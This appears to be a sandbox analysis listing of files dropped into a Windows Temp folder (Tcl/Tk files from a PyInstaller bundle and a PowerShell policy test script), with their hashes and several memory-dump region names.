SHA512 824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

C:\Users\Admin\AppData\Local\Temp\_MEI15442\tcl8\8.5\msgcat-1.6.1.tm

MD5 db52847c625ea3290f81238595a915cd
SHA1 45a4ed9b74965e399430290bcdcd64aca5d29159
SHA256 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55
SHA512 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

C:\Users\Admin\AppData\Local\Temp\_MEI15442\tk\tk.tcl

MD5 3250ec5b2efe5bbe4d3ec271f94e5359
SHA1 6a0fe910041c8df4f3cdc19871813792e8cc4e4c
SHA256 e1067a0668debb2d8e8ec3b7bc1aec3723627649832b20333f9369f28e4dfdbf
SHA512 f8e403f3d59d44333bce2aa7917e6d8115bec0fe5ae9a1306f215018b05056467643b7aa228154ddced176072bc903dfb556cb2638f5c55c1285c376079e8fe3

C:\Users\Admin\AppData\Local\Temp\_MEI15442\tcl\tclIndex

MD5 e127196e9174b429cc09c040158f6aab
SHA1 ff850f5d1bd8efc1a8cb765fe8221330f0c6c699
SHA256 abf7d9d1e86de931096c21820bfa4fd70db1f55005d2db4aa674d86200867806
SHA512 c4b98ebc65e25df41e6b9a93e16e608cf309fa0ae712578ee4974d84f7f33bcf2a6ed7626e88a343350e13da0c5c1a88e24a87fcbd44f7da5983bb3ef036a162

C:\Users\Admin\AppData\Local\Temp\_MEI15442\tcl\auto.tcl

MD5 5e9b3e874f8fbeaadef3a004a1b291b5
SHA1 b356286005efb4a3a46a1fdd53e4fcdc406569d0
SHA256 f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840
SHA512 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b1urxq5s.qst.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4080-1076-0x000002CD1A330000-0x000002CD1A352000-memory.dmp

memory/4080-1080-0x000002CD1A730000-0x000002CD1A74C000-memory.dmp

memory/1544-1092-0x00007FF61FD50000-0x00007FF61FDA9000-memory.dmp

memory/3652-1093-0x00007FF61FD50000-0x00007FF61FDA9000-memory.dmp